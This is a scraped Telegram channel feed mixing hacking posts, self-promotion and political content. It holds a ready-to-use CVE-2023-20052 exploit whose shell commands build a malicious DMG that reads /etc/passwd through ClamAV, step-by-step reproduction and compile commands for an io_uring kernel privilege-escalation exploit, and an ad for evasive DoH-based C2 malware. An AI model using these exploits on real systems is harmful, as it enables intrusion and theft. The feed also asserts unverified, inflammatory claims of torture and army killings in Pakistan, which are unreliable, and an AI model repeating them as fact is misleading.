CrackCodes 🇮🇳
15.9K subscribers
1.89K photos
387 videos
722 files
3.67K links
Official Websites: https://crackcodes.in |
For Bug Hunters: https://system32.ink

Admin: @MynK0x00
About Admin: prapattimynk.crackcodes.in


Be Secure~
जय श्री राम
Download Telegram
🔥Linux kernel io_uring out-of-bounds access to physical memory( commit 776617d " io_uring/rsrc: check for nonconsecutive pages" )

A bug in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) allows OOB access to physical memory beyond the end of the buffer. This can be used to achieve full LPE.

Bug reproduction steps(PoC exploit attached):

1️⃣ Create a memfd

2️⃣ fallocate a single page in that file descriptor

3️⃣ Use MAP_FIXED to map this page repeatedly, in consecutive locations

4️⃣ Register the entire region that you just filled up with that page as a fixed buffer with IORING_REGISTER_BUFFERS

5️⃣ Use IORING_OP_WRITE_FIXED to write the buffer to some other file (OOB read) or IORING_OP_READ_FIXED to read data into the buffer (OOB write).

compile exploit:

💾normal:

gcc -Wall -Wextra -std=gnu17 -Os -s exploit.c -luring -o exploit

💾static:

gcc -Wall -Wextra -std=gnu17 -static -Os -s exploit.c liburing.a -o exploit

Download Exploit:
https://system32.ink/news-feed/p/349/
Sources say that former Pakistani PM Imran Khan is being subjected to brutal torture by the imperialist slave Pakistani army, at an unknown location.

He was not only humiliated by being force-fed pork, but also stripped naked and beaten by intelligence officers. 😭

ذرائع کا کہنا ہے کہ سابق پاکستانی وزیر اعظم عمران خان کو سامراجی غلام پاکستانی فوج کی جانب سے نامعلوم مقام پر وحشیانہ تشدد کا نشانہ بنایا جا رہا ہے۔

اسے زبردستی سور کا گوشت کھلا کر نہ صرف ذلیل کیا گیا بلکہ انٹیلی جنس افسران نے اسے برہنہ کر کے مارا پیٹا۔ 😭
❤‍🔥4
स्वाहा! ✌️
🤓2
SpiderSuite

An advance cross-platform and multi-feature GUI web spider/crawler for cyber security proffesionals. Spider Suite can be used for attack surface mapping and analysis
1
MeliziaC2

DNS over HTTPS targeted malware (only runs once)

• Auto-delete malware on failure
• Fully encrypted (per victim RSA key) DoH (DNS-over-HTTPS) communication
• Malware only runs once!
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Host Header Injection

𝙇𝙞𝙣𝙠: https://youtube.com/shorts/bqx9HShT0oo?feature=share

𝙋𝙡𝙚𝙖𝙨𝙚 𝙇𝙞𝙠𝙚 & 𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏☺️
This media is not supported in your browser
VIEW IN TELEGRAM
Report on Situation in Pakistan

All characters mentioned above in video are fictional...
This media is not supported in your browser
VIEW IN TELEGRAM
Pakistan under Martial Law.

Today at Multiple locations Pakistan Army opened fire on PTI protestors and killed many civilians in Pakistan.
😱1
A large number of protestors from Khyber Pakhtunkhwa have reached near the Police lines H-11 in Islamabad, carrying guns and sticks.

Videos haven't coming out yet due to media and internet blackout.
Forwarded from CYBER DEMONS (INDIA🇮🇳) 🤖CHANNEL🤖 (ᴴᴬᶜᴷᴸᴼᶜᴷ)
PHISHING - DON'T BE A VICTIM

( AUDIO VERSION )

Learn how to protect yourself from phishing attacks with our comprehensive guide ” Phishing : Don’t Be A Victim ” . Discover the different types of phishing and how to identify them, as well as the preventative measures you can take to safeguard yourself from cybercrime. Don’t let scammers trick you into handing over sensitive information – read our guide now and stay safe online! 🔥😾

LISTEN FULL👇👇

https://cyberdemonsindia.42web.io/cyber-security/learn-with-podcasts/
💥CVE-2023-20052 exploit

To create malicious DMG file:

$ git clone
https://github.com/XXXXXXXX/CVE-2023-XXXX.git
$ cd CVE-2023-20052
$ sudo docker build -t cve-2023-20052 .
$ sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash
$ genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
$ bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "
http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg
To trigger exploit:

$ clamscan --debug exploit.dmg
👌1
Forwarded from CYBER DEMONS (INDIA🇮🇳) 🤖CHANNEL🤖 (ᴴᴬᶜᴷᴸᴼᶜᴷ)
CHIT CHAT ON SOC 👽 WITH

@abhinavkakku ( SOC ANALYST) BHAIYA

AT @cyberdemonsindiaa

TIME - 8:00 PM TODAY ( AFTER HALF AN HOUR )

#hacker_bano_chutiya_nahi 👌
Make Your Machine’s Static Address | Port Forwarding Without Router | Static Address (New Method) Life Time Port forwarding

Port forwarding, also known as port management, Allows remote servers and devices on the internet to be able to access devices that are on a private network. If you are not using port forwarding, only devices on that private internal network can have access to each other or your network.

Read Full Article: https://bit.ly/Port_Forwarding
National Technology Day !

Jai Hind 🇮🇳
6🤓1
The Cost of Cybercrime

The Story of How Rahul’s Actions Led to Serious Consequences

ISKE BARE ME JYADA NAHI BTAUNGA ❤️PADHO JAKE ACHA LAGEGA


READ FULL STORY BLOG 👇👇👇

http://cyberdemonsindia.42web.io/cyber-security/short-stories-cyber-security/the-cost-of-cybercrime-the-story-of-how-rahuls-actions-led-to-serious-consequences/

#hacker_bano_chutiya_nahi
Point no 2 summarizes the state of Pakistan.

Viral Letter 🔺@AngrySaffron
😱7👍1💔1
Media is too big
VIEW IN TELEGRAM
BIG ⚡️⚡️ Leaked Recording 🚨 Another Hassan Siddiqui from Pak Armed Forces exposed themselves !!
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Stored XSS

𝘾𝙤𝙪𝙧𝙨𝙚 𝙇𝙞𝙣𝙠 : https://youtube.com/watch?v=uUmMc05iFuo&feature=share

Please Share your views
&
𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏🏻

𝙏𝙝𝙖𝙣𝙠𝙨 𝙛𝙤𝙧 𝙮𝙤𝙪𝙧 𝙎𝙪𝙥𝙥𝙤𝙧𝙩. ☺️